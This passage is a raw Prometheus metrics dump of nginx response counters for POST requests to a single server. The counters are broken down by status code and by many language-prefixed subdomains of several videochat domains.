nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tg.videochat.world"} 371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="th.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="th.videochat.date"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="th.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="th.videochat.show"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="th.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="th.videochat.world"} 257 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tl.videochat.cafe"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tl.videochat.date"} 232 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tl.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tl.videochat.show"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tl.videochat.tv.br"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tl.videochat.world"} 320 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tr.videochat.cafe"} 119 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tr.videochat.date"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tr.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tr.videochat.show"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tr.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tr.videochat.world"} 76 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tt.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tt.videochat.date"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tt.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tt.videochat.show"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tt.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tt.videochat.world"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="udm.videochat.cafe"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="udm.videochat.date"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="udm.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="udm.videochat.show"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="udm.videochat.tv.br"} 441 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="udm.videochat.world"} 1423 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uk.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uk.videochat.date"} 168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uk.videochat.mx"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uk.videochat.show"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uk.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uk.videochat.world"} 849 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="update.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ur.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ur.videochat.date"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ur.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ur.videochat.show"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ur.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ur.videochat.world"} 79 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="usavbchm.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uz.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uz.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uz.videochat.mx"} 207 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uz.videochat.show"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uz.videochat.tv.br"} 589 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uz.videochat.world"} 239 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vi.videochat.cafe"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vi.videochat.date"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vi.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vi.videochat.show"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vi.videochat.tv.br"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vi.videochat.world"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="videochat.cafe"} 3628 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="videochat.date"} 4209 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="videochat.mx"} 2215 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="videochat.show"} 1146 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="videochat.tv.br"} 4382 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="videochat.world"} 3735 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vmi460104.contaboserver.net"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vmi460104.contaboserver.net:80"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="waqqvxh.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="whuinar.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="wngqune.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="wordpress.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="wp.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="wwswnaz.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="www.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="www.videochat.date"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="www.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="www.videochat.world"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xbodfbs.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xgyvqlo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xh.videochat.cafe"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xh.videochat.date"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xh.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xh.videochat.show"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xh.videochat.tv.br"} 142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xh.videochat.world"} 492 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ybifrit.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="yfutyaz.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="yi.videochat.cafe"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="yi.videochat.date"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="yi.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="yi.videochat.show"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="yi.videochat.tv.br"} 240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="yi.videochat.world"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zdchomr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zdkfdnl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zh.videochat.cafe"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zh.videochat.date"} 231 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zh.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zh.videochat.show"} 209 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zh.videochat.tv.br"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zh.videochat.world"} 350 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="405",vhost="videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="127.0.0.1"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="127.0.0.1:8080"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="161.97.120.25"} 419 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="161.97.120.25:80"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="al.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="am.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="am.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="am.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ba.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ba.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ba.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="be.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="be.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="bg.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="bn.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="bn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ceb.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ceb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="chm.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="cs.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="cs.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="cs.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="da.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="da.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="de.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ee.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ee.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="el.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="el.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="el.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="el.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="eu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fa.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fa.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fi.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fi.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fi.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fr.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ga.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="gl.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="gu.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="gu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="he.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="he.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="hi.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="hi.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="hr.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="hr.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ht.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ht.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ht.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="hu.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="hu.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="id.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="id.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="is.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="is.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="it.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="it.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="it.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="jp.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="jp.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="jv.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="jv.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="jv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="jv.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="jv.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="km.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="km.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ko.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="kxylkid.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ky.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="lb.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="lb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="lilvami.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="lt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="lv.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="lv.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mi.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mk.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mk.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ml.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ml.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mrj.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ms.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="my.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ne.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ne.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="no.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="pa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="pl.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="pl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="pt.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="pt.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ro.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ro.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ro.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ro.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sco.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="si.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sk.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sl.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sl.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sl.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="su.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="su.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sw.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="tg.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="tg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="th.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="tl.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="tl.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="udm.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="udm.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="uk.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ur.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ur.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="vi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="vi.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="xh.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="yfutyaz.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="yi.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="zh.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="zh.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="161.97.120.25"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="af.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="af.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="af.videochat.world"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="al.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="al.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="al.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="al.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="am.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="am.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="am.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="am.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ar.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ar.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ar.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ar.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="az.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="az.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="az.videochat.tv.br"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="az.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ba.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ba.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ba.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ba.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ba.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="be.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="be.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="be.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="be.videochat.world"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bg.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bg.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bg.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bg.videochat.world"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bn.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bn.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bn.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bn.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bn.videochat.world"} 22 